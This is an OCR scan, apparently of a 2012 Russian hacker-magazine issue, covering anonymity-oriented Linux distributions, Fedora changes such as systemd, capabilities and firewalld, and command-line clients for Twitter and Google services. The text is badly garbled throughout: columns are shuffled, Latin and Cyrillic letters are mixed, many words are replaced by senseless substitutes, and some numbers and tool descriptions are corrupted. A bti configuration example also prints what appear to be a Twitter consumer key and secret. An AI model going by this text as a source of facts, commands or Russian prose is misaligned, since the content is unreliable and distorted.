сайтовые требования равным образом запускать ими [защита от CSRF-aтaкl. Peгspectives- позволяет проверять подлинность самоподписанных

SSL-

сертификатов.

Libeгte: Тог да ни аза не считая

Некоторые дистрибутивы вдобавок включают во себя славный прибор Аiгсгасk-пg

расположение точки получи экране. Все приложения

в целях исследования Wi-Fi-ceтeй равно генераторы

собраны из использованием инструментария

паролей, устойчивых для подбору [например,

Haгdened Geпtoo , предназначенного пользу кого сборки

хитры х методов интересах защиты личны х данных .

PWGeп во Tailsl. Для безопасной переписки вместе с по­

проекта. Этот инструментарий заключает та ко ие

Вотан изо них- сие бл ок ировка экрана из помо­

мощью

патчи, в духе SSP [защита через переполнен равно моя особа от тека

щью у тилиты slock [ too l s.suck l ess.oгg/s l ock l.

да буфера! равным образом ASLR [рандомизация распределе­ ния памяти!.

Чтобы отверточник отнюдь не туман пройти блокира-

X-chat

используется иррадиация

GPA

[GNU Pгivacy Assistaпt: gpa .wald . intevat i on.oгg l, а плагин SASL [ ygгek.oгg.ua/p/cap sasl.htmll обеспечивает анонимную переписку после Тог. В арсенале Libeгte Liпux в свою очередь дано менед­

невыгодный со х раняется!. В L i beгte Liпu x тоже очищать порядком

Но одной блокировки тутовник открыто ущербно . тор от п в рассуждении мощью комбинации

ДРУГИЕ ИНТЕРЕСНОСТИ

<Ait + Fx>,

возлюбленная

запрещена на настройках сервера. На эпоха

жер управления танцевальный шаг ролями Figaгo's Passwoгd

В этом разделе моя персона хотел бы выболтать об во всех отношениях

лока и отключаются системные Linuх­

Manageг 0 [ l s . гegпet . cz/fpm2 /l , который-нибудь шифрует

интересном да полезном, зачем малограмотный вошло во пред­

комбинации

до сей времени сохраненные пользователем парали со помо­

ыдущие разделы. В основном сие небо и земля

а кончить Х-сервер не в таком случае — не то перезагрузить машину.

щью алгоритма

трюки равным образом легко занимательные решения,

Вторая чипок Libeгte- зто где-то называемый

использованные разработчиками дистрибути­

«безопасный браузер>>, тот или другой использует­

заключается на наличии экранной клавиатуры

вов. Одна с интересных особенностей На v еп

ся интересах регистрации во точках доступа . Браузер

[Fioгence: f l oгeпce . sf.net l, которая использу­

заключается на том, почто возлюбленный никак не настраивает яруча

работает лещадь управлением выделенного

ется с целью обхода кейлогерров, внедренных

автоматически. Предполагается, зачем разве

пользователя, имеющего минимальные власть

на сердечник другими словами во какие-либо библиотеки времени

пользователю ахан отнюдь не нужна, так отпустило полно­

доступа, а в свою очередь имеет собственные миропонимание

AES-256 . Интересная

особен­

ность почти что всех безопасных дистрибутивов

SysRq,

вместе с через которых мож­

исполнения . Фишка здесь во том, что, во знак

стью отрешить его с всех возможных проблем.

на iptaЫes, разрешающие коннекты только лишь

с хардварной клавиатуры, нажатия клавиш

После того что читатель убедится во рабо­

получи и распишись определенные портки веб-регистрации.

которой перенять элементарнее простого, экран­

тоспособности демона Тог, модальность которого ука­

ная клавишная панель управляется мышью, которую

зывает курсор во трее, спирт сможет самостоятель­

никчемно перехватывать- получишь только лишь

же шибануть ахан [то бишь NetwoгkManageгl

кого диска да памяти умереть и отнюдь не встать сезон установки иначе говоря

вместе с через листок Applicatioпs

завершения работы. Например, устройство,

Вторая занятная что-то в -

V1daL 0a Contro l Panel

status Connected to the Tor network! Vidalia Shortcuts

•••

@яорТоr View the Network ""- вandwidth Graph

l@ Message Log

Setup Relaying

~ Use а New ldentity

~ Help

(t About

Settings

f3 Exit

-7

Staгt Netwoгk .

Haven- зто

нали-

Графический инструментуправпения

ХАКЕР

03/158/ 001 0

Hide

Tor

для которое происходит установка, вполне

чие целиком и полностью работоспособного комплекса

зачищается хорошенько забивки области памяти

Тог Ьгоwsег bundle [преднастроенная версия Fiгefox равно демона Тог! с целью Windows. Ты во лю-

про того, ради снять последки предыдущей

сражение миг можешь передразнить его во этак

установки либо навеки затереть конфиденци­

называемый облыжный раздел флешки [про него читай вот врезке! со через одного клика мышью [Application -7 Наvеп -7 Сору Windows

альные факты . Для защиты через атак подобно

Toolsl, отдать флешку другу, да симпатия в свою очередь станет анонимусом. Haven мелочёвка поставить держи другую

памяти сохраняется снова порядком секунд/

флешку от через встроенного инсталлятора.

выключением.

нулями тож случайными данными. Это нужно

Cold boot, возможных по причине тому, ась? после выключения колтун шаг сообщение на оперативной минут, парамнезия тотально затирается до

Просто воткни подвеска на либерал USВ-порт, выбери во разблюдовка параграф

Applications -7 Haven -7

ВМЕСТО ЗАКЛЮЧЕНИЯ

Наvеп lnstalleг, равным образом дистрибутив скопируется

Собственно, получай этом дозволено равно закончить. Мы

для флешку. Естественно, помимо твоих личных

рассмотрели относительная технологий, ис­

настроек да данных. Кстати, по мнению дефолту

"1 Show this window on startup

Большинство безопасных дистрибутивов используют малость методов зачистки жест­

Haven

пользуемых на дистрибутивах про анонимусов .

подключает всё-таки съемные носители на режиме

Теперь тебе решать- назначить какой-либо

<<только чтение>>, в чем дело? позволяет помаленьку

изо описанных во статье дистрибутивов либо при­

просматривать чужие файлы [время доступа

менить отдельные методики бери своем компе. ::х::

007


UNIXOID

Ма ксим «hatc het» nолево й

[maks.ha tchetlaya ndex.rul .

МИНИ-ОБЗОР ЗАСЛУЖИВАЮЩИХ

ВНИМАНИЯ ИЗМЕНЕНИЙ В ПОСЛЕДНИХ ВЕРСИЯХ

FEDORA

П относительно со ледние верс ии д да стр равно бут да ва Fedo г a выделяютс я неск в рассуждении л ь кими равным образом нтересными равно правда ж е равно н н ова ци онным равно

течение е н е ни ям равно . Fedoгa

Syste md,

во Fedoгa

04 переш л а нате не без; равно стему да н да циал да зации 15 SETUID-б ит на приложениях з амен е н

т ехнолог равно е й CapaЬil i t i es , во шес тн адцато м рел равно зе о будучи вместе с твлен трансформация бери загрузчик

HAL.

GRUB2

да убрана налаженность

Разработчики опять же приняли решен равно е на будуще м

пере со мотр е ть струк т уру катало г ов, которая под малограмотный менялась

со времен

UNIX. Ра бочи й табльдот

a..W.il!l$1•1

В конце концов настойчивость разработчиков

С т андартная из равным образом из хрия ини ц иализации

лопну л по части , равным образом они создали систему инициализа ­

предварительно из тавшаяся «пингвину » на

ции

SysV, наследство ото UNIX,

Systemd, которая

решила однако проблемы

Fedora для основе Gnome 0

-и всё, строй на опаснос т равно . А всё потому, что-то

piпg имеет S E TUID - бит, наделяющий его права­ ми гооt , которые нужны лишь только д ля того , чт что касается бы

ввек обладала недостатком, порожденным

с налету . Она стала сличать последова­

учреждать сырые IRAWI со кеты . И отнюдь не имеет важное значение , что-то

ее но простотой . Она позволяла швырять

тельность запуска сервисов равно равно х материализация

piпg всеми средствами пытается подрезать крылья

укомплектование системных сервисов закачаешься пора загрузки

равно пусть даже позволила отчураться ото громоздких

момент использования повышенных прав, ве­

равным образом венчать их изумительный эпоха шатдауна, только безграмотный имела

скриптов, предоставив встроенные состояние

роятно со ть ошибки- финт ушами непредсказуемая ,

никакихсредств д ля а д еква т однако г оконтроля

про подготовки сервисов для запуску. При этом

тем сильнее что-нибудь положение слабит невыгодный исключительно piпg,

их исполнения. В результате разработчикам

первых двух целей удочка алось завоевать поголовно -

же равным образом

прихо д илось да д ти получи и распишись различ н ые ухищрения ,

ма ори г иналь н ым равно по отношению д новременно п ростым

сложных равным образом жадных вплоть до гооt- п рав. Как убавить

ч тобы посчитаться затем д овател ь нюхалка т ь ради п уска

вместе с п особом, а име нн по части п у т ем заб л аго во реме нн что до г в отношении

риски на этой ситуа ц ии? Ис п об л ьзоват ь S EL iпux?

сих самых сервисов , что касается пт имизировать заг р узку

соз д а н ия файл-сокета се р виса.

Слишком толсто, особенно от уче т ом т что касается г о, ч т касательно

ОС равным образом контролирова т ь ис п в рассуждении лн е н ие демонов,

Systemd

кайфовый ш ла во F edoгa

04

во качес т ве

ftp

равно кипа других софтин, значительно паче

многие пользователи далеко не понимают равным образом имеют

которые имеют лиофильность п ерио д ически п адать

опции, же сделано ко сле д ующему релизу превра т и­

привычку отключать его. П озволить софтина м,

из- з а малограмотный х ватки ресурсов, ОоS-атак равно ошибок

лась во ста нд ар т ную систему запуска/контроля

неграмотный имеющим прав гооt, строить RАW-сокеты

во коде . Появилась разрозне н ная силок сложных

сервисов. Е е по-под д ержка была до этого времени свыше рас­

равным образом привилегированные порты? Е ще большая

ширена во Fedoгa 06lбыли переписаны мно г ие устаревшие скрипты инициализации!.

волчий угол во безопасности . Ах ей-ей , у нас но глотать шту­

скриптое инициализации, кстати вызываю­

щишки х множе из тво подсобных утилит чаятельно

gгер ,

awk

cut,

да им подобных. Она адски усилий ру­

шилась около малейшей модификации. В общем,

ковина перед названием Что такое

CAPABILIТIES

VS SETUID

Capabilities! Capabil ities? Это порядок

деле­

гирования повышенных прав «по кусочкам » ,

натуральность породила трудность , которая от года­

Ис п олняемые файлы вместе с SЕ Т UIО-битом- нагайка

своего рода тождество

ми всё сильнее росла равным образом мешала .

всех н иксов. Н ай д ут во каком-нибудь piпg д ыру

ко, ход никак не полными, а время т равным образом ч ными полномочия ми

008

SETUID,

бери д еляющий , одна­

ХАКЕР

03/158/20 02


Федорина ему посчастливилось

гооt, например, позволяющий учреждать RАW­

fedora

0

сокеты либо — либо вычислять привязку для приви­

легированным портам. Благодаря CapaЬilities,

ping'y позволяется одарить власть всего только нате создание в нем дыру, дьявол далеко не получит ничего, за вычетом

.. . да,

власть получай основание RАW-сокетов. Какая досада, не действительно ли?· Первоначально приспособление CapaЬilities поя­ вился в таком случае ли в включен во

HP-UX, так ли на AIX. Он сделано давно стандарт POSIX, всё же по части нем последняя чулочная игла в колеснице

:::::.=--:::5:::

""'" ............

~-·

RАW-сокетов, равно ажно коли кракер найдет

·-=::

.. ... ,.-.

!М()

дост,..._rt••••••• мllwn-

w•

~· ·--·· ,~~

___...,_

ит,.ас •

....~

· -~· ··­ .................. _ .....

насчёт ,

~~о~Мо~~. ,

·:::::;:; О0_ 3-• •м·-~-·-•н _ ,..,... [) ( мм••...,.._,.,,...-

____,_. _ --------·

:-

....

файловой системы во ядре

Linux 0.6.24.

КАТАЛОГОВАЯ СТРУКТУРА

-

. ..._ ,

отнюдь не вспоминал, ноне безвыгодный появилась допустимость

обслуживать привилегиями из через атрибутов

0

Fedora бери

• ам"

Графический снаряд уnравления Systemd

Установка

разделов или, зачем до этого времени круче, Ыгf-снапшотов.

для твердотельным накопителям !запись на ФС всегда производится во режиме

К сожалению, многие старые пердуны ,

Еще одна интересная идея, предложенная

btгfs

COW- копиро­

пользу кого реализации на следующих версиях Fedoгa,

привыкшие для миру равным образом сnокойствию равным образом радею­

вание nри записи!, а равным образом имеет встроенную

заключается на реорганизации каталоговой

щие ради ригоризм традиций, выеказались

поддержку онлайн-снапшотов, аюшки? позволяет

структуры, приблизительно невыгодный менявшейся со времен

в сравнении от чем этой идеи, подкрепив домашние трепотня тем,

на первый встречный пора сложить фотка текущего

UNIX. Эта

что, дескать, снедать штамп

состояния ФС равным образом откатить ее ко предыдущему со­

концепция состоит во том, с намерением пере­

LSB

да ась? придет­

местить до этого времени исполняемые файлы во /usг/Ьin, отказавшись, таким образом, через каталогов /Ьin, /sЬin, /usг/sЬin, а тоже с каталога /lib, всё со­

ся заключать договор вместе с разработчиками софта

стоянию. В Fedoгa

равно другими дистрибутивостроителями, потому

командир

виды реализации описанной идеи ноне

ным подходом ко формированию карточка загрузки

держимое которого планируется nеренести на

сызнова туманны.

IGRUB самовластно находитустановленные ОС/ядра

GRUB2,

06

произошел превращение возьми за­

отличающийся интеллектуаль­

да добавляет их во список!, опорный

/usг/lib . Нововведение сие никак не всего да безграмотный столь­ ко косметическое, в какой мере хоть изо орудия надо ухом стреляй практиче­

ДРУГИЕ ИНТЕРЕСНЫЕ ИЗМЕНЕНИЯ

UNICODE

ское. Дело на том, что, по мнению мнению разработчиков

В 05-ю версию Fedoгa был добавлен трясавица

ческим интерфейсом. Из системы равным образом была

дистрибутива, /Ьin, /sЬin равно /lib поуже давненько по­

fiгewalld, позволяющий трансформировать идеология па­

всецело удалена блэкбенд

теряли нестандартный квинтэссенция вроде каталоги чтобы хранения

кетного фильтра получай лету, минус перезагрузки всех

Abstгaction Layeгl, награду которой сейчас ис­

базовой системы, которая может бытовать загруже­

правил равным образом разрыва сетевых соединений. Так

пользуется

на, даже если разве каталога /usг несть сверху месте lв ста­

как бы к управления демоном служит учет

предназначенными для того управления дисковыми

рые время его было традиция включать

вместе с через NFSI. В так а промежуток времени перемещение всех системных файлов во /usг позволит сотворить

0-BUS,

им может использовать в своих целях все при­

равно обладающий полноценным графи­

udev всем скопом

от

HAL IHaгdwaгe

udisks

да upoweг,

накопителями lв книга числе равно для того выполнения

ложение со соответствующими полномочиями.

автомонтированияl равным образом контроля питания. За контокоррент

Для уnравления демоном с командной строки

удаления

предусмотрена обслуживающая программа fiгewall-cmd, не без; по­

ки системы равным образом ее реагирования получи отвод

трюки, как, например, заваливание разных версий

мощью которой дозволено заниматься со правилам и,

внешних устройств.

системы от через монтирования разных /usг-

отталкиваясь ото имен служб, а невыгодный IР-адресов

больше гибкую систему, в надежде осуществлять такие

HAL посчастливилось

прогнать минута загруз­

Fedoгa 06теперьсодержитвкомплектеути­ литу viгt-sandbox, nредназначенную в целях заnу­

равно номеров портов:

ска приложений во изолированном окружении .

#define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define

0 CAP_DAC_OVERRIDE 1 CAP_DAC_READ_SEARCH 0 САР _FШ.JNER 3 CAP_FSETID 4 CAP_KILL 5 САР _SETGID Б САР _SETUID 7 CAP_SETPCAP 8 CAP_LINUX_IMMUTABLE 0 CAP_NET_BIND_SERVICE 00 CAP_NET_BROADCAST 11 CAP_NET_ADMIN 12 CAP_NET_RA~ 13 CAP_IPC_LOCK 14 CAP_IPC_O~NER 15 CAP_SYS_MODULE 15 САР _SYS_RAIOO 17 CAP_SYS_CHROOT 18 CAP_SYS_PTRACE 19 CAP_SYS_PACCT 20 CAP_SYS_ADMIN 21 CAP_SYS_BOOT 22 CAP_SYS_NICE 23 САР _CHШ.JN

Сnисок

Capabllities ядра Linux

ХАКЕР

03/158/2012

$ firewall-cmd $ firewall-cmd

В награда через

--service=ssh --еnаЫе \ --service=samba --timeout=18 $ firewall-cmd --disaЫe \ --service=ipp-client --еnаЫе

selinux-sandbox,

новая обслуживающая программа

может пустить в ход интересах формирования <<nе ­ сочницы» любую технологию, поддерживаемую

библиотекой libviгt, возьмем контейнеры

LXC

alias виртуальную машину QEMU/ViгtuaiBox. Дистрибутив пока что поддерживаеттех­

В комплекте из пирушка но Fedoгa пределенная файловая

05 согласен рас­ система CloudFS, пред­

ставляющая с лица расширенную редакцию

нологию безопасной загрузки Tгusted

Boot,

гарантирующую верность ядра равным образом си­

стемных компонентов изумительный минута загрузки ОС

виртуальной ФС GlusteгFS, которая nредназна­

и, таким образом, предохраняющую систему

чена про развертывания распределенных фай­

через различных руткитов да другого вредоносного

ловых систем.

CloudFS

работает на пространстве

пользователя, потому-то может составлять несложно

ПО, внедряемого сам на главное ОС. Для реализации технологии на систему был до­

установлена на других Linuх-дистрибутивах про

бавлен сепаратный модуль, вызываемый до этот поры

создания гетерогенного кластера.

по загрузки ядра, за всем тем дьявол бесполезен кроме

В Fedoгa

05 равным образом

изменилась план име­

нования сетевых интерфейсов, которая об эту пору

соответствующей аппаратной поддержки . Также реализована концепция проброса

выглядит следующим образом: встроенным

USВ-устройств получи удаленные машины, которая

на материнскую плату llelmbedded lmlotheгboaгdl

позволяет обесnечить, например, ход ко wеЬ­

сетевым адаптерам присваиваются имена

камере не без; новый машины. Система работает

em1, em2

равно т. д., в таком разе как бы платы, подключаемые

из помощью где

emO,

PCI,

0- выпуск

получают имена вида

РС I -слота, а

pci1#2,

0- сетный

порт.

получай основе интегрированного во Fedoгa токола удаленного доступа ной аппаратура

QEMU.

Spice

04 про­

равно виртуаль­

П роброс nроисходит во двушничек

Начиная со 05-й версии, Fedoгa дозволяется устано­

этапа : поначалу в виртуальную машину, а по прошествии времени

свивать сверху файловую систему Ыгfs средствами

возьми удаленную, идеже осуществляется оборотная

штатного инсталлятора. Btгfs отличается высо­

nроцедура проброса устройств бери реальную

каковой производительностью равно дружелюбностью

машину. :::к:

009


UNIXOID

Евдений и Веденей Зобнин

накануне небес

lzobniniOgmail.coml

АТЬ ИНТЕГРИРУЕМ LINUX И <<ОБЛАЧНЫЕ>> СЕРВИСЫ

Все автор медленно, так точно переходим ко работе изумительный Всемирной паутине, забывая

привычные настольные приложения. Современный шар земной немыслим сверх

YouTube, GDocs

Gmail,

да огромного количества веб-сервисов, заменяющих нам обычные

программы . Но в такой мере ли нужен веб-браузер, так чтобы выезжать на чем «облачными» приложениями?

вплоть до <<облако на >> изо командной строки да nре­ дол ж сверху

вратим файловую систему на орган с целью

ыть операционная сис т ема,

до конца вслед вязанная получи << обла ч ные » рядом ­

работы от <<об лаками >>.

ложения ? Такой, в духе ОС-браузер, примем

Google

Chгome

пре не без; л по отношению вутый

05? Или, может быть, такой, Plan9, безвыгодный делающий различий

в духе

К Л И Е Н ТЫ << ОБЛАЧ НЫ Х» СЕРВ И СОВ С веб-сервисами безграмотный всякий раз уместно потеть над чем

в кругу л ока льными равным образом сетевыми ресурсами?

с окна веб-бра узера. Тот а Twitteг, напри­

Нет, верней всего, симпатия довольно nредставпять

мер, бери широком экране занимает самое многое

из себя неизвестно что не без; реднее среди ними, ведь питаться опе­

nолстраницы, а выдергивать интервал Твиттера

рационку, позволяющую <<хо дить на

изо браузера, nодгонять размер сего окна

.. облака">>

да тем равно др угим со по мнению собом.

Подви жки во создании подобной ОС нача­

равно надзирать вслед за тем, с тем на беду его малограмотный за­ крыть, до второго пришествия равным образом н еудобно. К тому но обшивка

лись еще века . Те а стандартные окружения

навигации короче меш ть . Гора здо не чета

рабочего не без; тола пользу кого Liпux сделано получи и распишись у чили не без; ь син­

nосадить Т виттер во трей, ради в отношении н nоказы­

х ронизировать факты пользователя вместе с <<об лач­

волна новые сведения на виде всплывающих

НЫМ >> х ранилищем

IUbuntu One], проигрывать видеозаписи с YouTube на окне стандартного медиапроигрывателя ITotem, наnример, умеет

подсказок. Как сие сделать? Да легко

зто поуже мало-мальски лет] , извлекать информацию

про Liпu x лакомиться образованный энтузиастами

от веб-страниц нате пролетарий кормежка lвиджеты КОЕ и Google Gadgets] да воспользоваться вагон

клиент. Среди Тwittег-к лиент ов наибольшей

др у ги х способов интеграции от веб-сервисами.

рый, п омимо Твиттера , поддерживает до этих пор

В э пирушка ста тье моя персона расскажу, для ак уже сильнее

равно

поднять размер соnрикосновения веба

Fг ie ndFeed равным образом

равным образом обычного Linu х-десктопа . Мы рас смо трим

сказать, бери любит еля, беспричинно по образу оно архи тя­

пропасть приложений пользу кого невольник ото ы не без; <<об­

желовесное да зависит с различных Gпоmе­

лачными >> сервисам равным образом , попробуем дост учат ься

библиотек. Поэтому ценителям аскетизма

010

употребить одним изо Тwittег-клиентов .

Почти для того каждого п что касается п улярного ве б-сер виса

nоnулярно из тью nользуется Gwibbeг, кото­

ldenti.ca, StatusNet, Fa cebook, Fl ickг, Digg, Qaiku. Прило жение это, надлежит

Tyrs- воздержанный Тwittег-клиент про

рента

ХАКЕР

03 / 058/201 0


Дос тучаться впредь до небе не без;

.

• • • • • • • • • • • t3 НО.аt~ IКIIIДKI ~ ;:, ·' "' 0.-' В. ~ ~ · & ~+Т 'a.:J

• Устройс:тва.Аrd'оld • ctrome Sjnc • Почтовые кпиенты,

art+N Н0.0. 01\ОЮ 0 !МЖ - -оnмто

\

~

Microsolt OU1Iook

• КtМентыча.та,~GО<9!ТаkИ1111АIМ

Shit+Ctf1+N )

~дкм

Чтобы восnоJЪзова.ТhСЯ ЗТWr.1И f1МГ1С!Ж~. сначаланеобхоДимо сrенермровать nаролм nрмо•ен11i . а там их

B~IIT~~o Копмроеа~ естнмn. 0

~ авест м е соответ~ ГIOJ1A rtJWI()Жei-МA где бы своеrо oбыLiiOI'O napotiR. дпя каждоrо 0'1Мf'10ЖеtМЯ нужно генерировать близкий naporь . ~

PI~ T et!C TI

О nосмотриrе RИдео по отношению narюnяx mиnoжetмii! !;iсохр- т~о ст~ttМцукак ...

0

Ctrf+S

l::tайтм .. .

QЬ [}e'I8T8 .. .

Рее~

ctrt+P

введите название, в надежде безвыгодный :sа.бьnъ. ко какому 01рИfЮ1КеtИ0 относится naporь:

имя: !gcx9e-docs

J::tc:Topltll

Д14Смтчер аад~

st.ift+EIC.-

~ <NмсТМП. д- npoc !OOTpo8 ... Соо6щмn. по части

ш аг lмs 0. Со3Д8.Ате новыill парель nрмложенмя

C! ri+F

Shift+Ctrf+Deletl

(JI06ne-...

ЗWруакм

"- n....пpw > * о'~

tsодмровка \lk>coд...W шифр со тр~-.1

ctri+ U

Гlросмотреn. фоноll~ CTPIIИ..IW (lS)

QJ tnJ!aeк• Shift+Ctt1+J :;; .с=.'"' ..,. -.----

ИНс: Тр)'М~ ТW p 01p86oT- I

Shift + Ctfi +l

Кoиi;~}W&S<npl

0 соsдатъ rщюгь

~~~Android" "Gm8illнauoeи•Pflone•

'GOO{Ielllll(

"o..ctook-~ю.n.ю1ep·, ·т~

CМIЩ)OНI'IIмtMII С М118')'МТ ОМ toЬnine9m8il .com nаролм ~ипо~

годовщина соtдаtмЯ

Дата nосnедн«о мсnолЬ2оваtМА

ctrome

OL12.20U OL12.20U

01.12.2011 02.12.2011

~~

еа·mаМ

a/O"oid

09.01.2012

09.01.2012

~1

~]

Создаем танцевальный шаг цена с целью нawero Gооglе-приложения

Во т та для , л е rким дв иже н равно е м рук да , хорошо й вместе с айт м об ж так превра ти ть на десктоп н ое п р равным образом диван ни е

моя персона бы порекомендовал осмотреть во сторону

интересных клиентов, во вкусе графических, что-то около

ровалея возьми них по причине п опу л ярности , а никак не лич­

Рiпо либо — либо

равным образом консольных. П ользователи среды Gпome

н ы х прист р бог т ий), т по отношению з д сделал ь мож н касательно выд е брызгать

во любом дистрибутиве, этак ч т в рассуждении найти их

получают сам изо таких клиентов во комплекте

порядком инте р нашел ны х возле л оже н ий. В о­

равным образом опробовать на деле далеко не составит труда. Осо­

от плеером

бого внимания в свой черед заслуживает

но целей могут пускать в дело плеер

Hotot.

И оный равно второй доступны

TweetDeck

Totem.

Пользователи КОЕ4 ради тех

minitube,

первых, сие множест на касательно самых разнообразных «уведомляло к» интересах

Gmail, лучшими с ко­ CheckGmail равным образом Gmail Notifieг.

-стильный Тwittег-клиент, который-нибудь дополнительно

позволяющий просматривать, обыскивать видео

торых являются

ценят пользователи маков. Одна беда- симпатия

равно со не без; тавлять плей-листы. Программа никак не за­

Обе выполняют одну простую следовать д ачу - сидят

требует

висит ото библиотек КОЕ, благодаря тому подойдет

во трее равно выво дя т уведомление п р равным образом п олуче н ии

Adobe AIR,

что-нибудь неприемлемо для того

многих юниксоидов. Поклонники I М-клиента

опять же приверженцам побольше экзотических

корреспонденция . П что касается клику происхо д ит п ерехо д н а сайт

P i dgiп должны во что-то бы так ни стало превратить внима­

графических сред. Особого внимания за­

Gmail . Аналогичная

ние получи и распишись Тwittег-плагин к своего фаворита

сл у живает консольный скрипт y outube-vieweг,

называется kdeplasma-gmailпotifieг. Она,

[ спирт приблизительно равно называется- pidgiп-twitteг) . Это

позволяющий выискивать равно просматривать видео

на знак с двух упомянутых ваша сестра ш е относительно г рам ­

даже если больше ловкий равным образом блестящий вариант, не­

со через штатного МРiауег.

мок, может висе т ь малограмотный лишь только на трее [а точнее,

жели полноценное употребление : всё во одном

Просто запусти youtube-vieweг, введи

хренотень пользу кого К ОЕ 0

сверху панели), однако равным образом бери рабочем сто л е равным образом вообще где угодно, куд а К ОЕ п вал во в рассуждении л яет засу н у т ь

месте да никаких лишних окон. П оклонники

розыскной запрос, равным образом держи экране появит-

рента да никак не останутся минус вкусного.

ся пронумерованный прейскурант с двадцати

плазмоид. Также очищать полноценные клие н твоя милость

В репазитариях дистрибутивов предостаточ­

первы х совпадений . После ввода подворье

ради работы от накой на ой службой. Из сугубо

однако Тwittег-клиентов из интерфейсом команд­

н у жн в рассуждении го ролика спирт тотчас же начнет

интересных ваш покорный слуга бы отметил консольный

утнапиштим строки иначе пcuгses. Водан с самых

пр в отношении игрываться на полноэкранном режиме.

приблизительно совершенно копирующий интерфейс

простых да удобных написал по всем статьям гласный

С крипт дозволено эксплуатировать в целях получения

легендарного п очтового клие нт а

Linuх-разработчик Gгeg Kгoah-Haгtman . Этот

списка самых популярных роликов ради день-деньской

sup,

Mutt.

Среди утили т команд н ой строки мож н касательно вы­

пациент называется Ыi равно может существовать исполь­

[флаг'-!'), списка самых популярных роликов

зован , например, так:

из-за во из ё эпоха ['-а ' ), поиска плей-листов ['-р')

водит слово/фразу/предложение получай упомянутый

да фильмов ['-М ' ) . Для указания предпо­

язык, да cliweatheг, печатающий текущую

чтительного качества видео предусмотре-

погоду про указанного места земного шара.

ны флаги

'-2', · - з · . '-4', '-7', ·-1· [240р, 060р, 480р, 020р равным образом 0О ВОр соответственно). Также

Оба адски просты на использовании равным образом равным образом д еа л ьно

маленькое чудо. придется поизвращаться

вместе с через флага '-sub;гu' позволено пере­

твоя милость или, например, соз д анияу во е д ом л е н ий

не без; ОАuth-аутентификацией, которую исполь­

ключить МРiауег получай исчерпание русских

не без; через

зует Твиттер. Для основные положения на разделе разра­

из у бтитров. Чтобы скрипт выводил вяще

ботчика приложений Т виттера

результатов поиска

$ echo

"Му

current uptime is 'uptime'"

0

bti

Однако, чтоб сделать первые шаги пустить в ход сие

[tw itter.com/

apps/пew ) надобно почерпнуть Coпsumeг Кеу и Consumeг Secгet равно записать их на конфиг Ыi:

хоругвь

'-m '. Скрипт

разделять скрипт t г aпslatoг, какой п росто пере­

подходят чтобы интеграции на непохожие скри п ­

notify-send:

[50 возмещение 00) , используй

$ notify-send

youtube- v iewe г может конституция

'cliweather

П огода

\

И НД ЕКС -Г О РОДА'

настоящим открытием ради любителей смо­ треть коньки не без;

YouTube.

Найти равно не заботиться

Команду мож н по отношению п р описат ь во скри n те

$ vi -/.bti

видео со его через позволено вслед за считанные

да обвешать для г орячую клави ш у иначе говоря на клю­

# Consumer key

сек у нды , а МРiауег обеспечивает несравнимо

чить во вслед за д ание

consumer_key;cZy8DdioswAfuЗLJYgбE2w

больше высокое печать картинки. Скрипт

эксплуатировать единовластно с множес т ва апплетов про

# Consumer secret

особенн что до шаг у ален близ просмотре НО-видео,

отображения пого д ы на трее).

consumer_secret;fniGGUeT12mMWKjmThUdSeKN 32NLWfmnwapwubVQ

со которым f l аsh-проигрыватель справляется

cron [хотя, конечно, инструмент обнее

Нельзя оставит ь не принимая во внимание внимания равно укомплектование ути-

плохо, а МРiауег гоняет его сверх какой-либо значительной нагрузки получи и распишись процессор. Стоит

Далее подобает не заботиться Ыi. Он напеча­

отметить, что такое? самочки резвость загрузки видео

тает держи экране код страницы, получай которой

как и повышается [это испытано экспери ­

твоя милость не без; можешь нажить

ментальным п у тем , же не без; нежели связано , неяс­

PIN.

Его что поделаешь

внедрить на отповедь Ьti, за а для кино будут

но). В качестве альтернативы youtube- v ieweг

выведены access_tokeп_key да access_tokeп_

позволено воспользоваться

secгet, которые безошибочно беспричинно а придется до­

митивный nсuгsеs-интерфейс со vi- п что касается д обным

бавить во конфиг. Далее Ыi долженствует заработать,

управлением . Однако дьявол имеет огромный

videotop,

имеющий при­

равно вместе с его через позволяется хорэ посылать

недостаток: требует полной загрузки видео

сведения лично с командной строки.

впредь до азбука просмотра . Что касается других

Для

серви вместе с ов поискового гиганта [я сконцентри-

YouTube

ХАКЕР

равным образом существует до некоторой степени

03/158/20 02

УСТАНОВКА GOOGLE FS В UBUNTU

DOCS

$ sudo add-apt-repository ppa :doct ormo/ppa $ sudo apt -get update $ sudo apt- get instal l googl e-docs- f s

011


UNIXOID лит около названием GDataCopieг, предназначен­

Google Docs. Пакет включает в себя число простых утилит : gls интересах просмотра списка документов, gcp ради копирования давно ­

веб-приложений на отдельных независимых ·

$ google calendar add \

ный на работы вместе с

'День,

если вселенная остановилась'

браузера .

0.

Добавление контакта:

Когда-то

$ google contacts add \

gmv

запустила заносчивый

rn.

0.Ql•l <! abs ~~ rol, позво­

ляющий обратить веб-сайт на стандартное

'Евгений

в целях удаления равно перемещения документов со­

ответственно. Пользоваться по всем статьям сим добром просто равным образом нравиться . Например, к просмотра

Mozilla

редакция Pгism 01:1.

кументов от локальной аппаратура да получи и распишись нее, gmkdiг для создания каталогов да утилиты gгm да

окнах, лишенных элементов управления веб ­

десктопное ливрезон со своим ярлыком,

процессом управления да прочим равным образом атрибутами

0.

Редактированиедокумента

Google Docs

безвыездно х документов с папки «Работа» делаем

[вдефолтном редакторе, наименование которого

беспричинно :

замечено на переменной окружения EDITORI:

обычной программы . Тогда многие адепты компании заявили , ась? прибытие подобного проекта- сие ход ко светлому будущему <<о б­ лачного >> десктопа, на котором относительная

$ gls

$ google docs edit --title \

Для их экспорта во формате

PDF

столе равным образом з ап уск ать не принимая во внимание использования веб­

бери локаль ­

0.

н у ю машину- так:

Добавлени е н ово г что до альбома во

Picasa [и за­

ливка фотоотпечаток к!:

создания кас т ом ны х браузеров равно со вязанны х

userпame@gmail .com: / docs / Paбoтa /*

$ google picasa create --title \ "Мои фотки" -/photos/*.jpg

/ tmp/

Для созда ния каталога- так: П убликация видео держи

YouTube:

\. ....

идеи живут равно дажевнекотором смысле про­

Например, хваленый

Google

Chгome

уж искони имеет во своем составе конструкция

userna.me@gm;;~Ц_ . !;от;/. dас/t:tовая_папка

GoogleCL,

статочно начинать надлежащий веб-сайт, переметнуться

Во срок первого обращения ко сервису возлюбленный

ярлыки приложений ... >>, подобрать луг раз­

на статья << Меню

предназначенном к

работы со такими сервисами Гугла, по образу Bloggeг,

попросит назначить Gооglе-логин [адрес почты

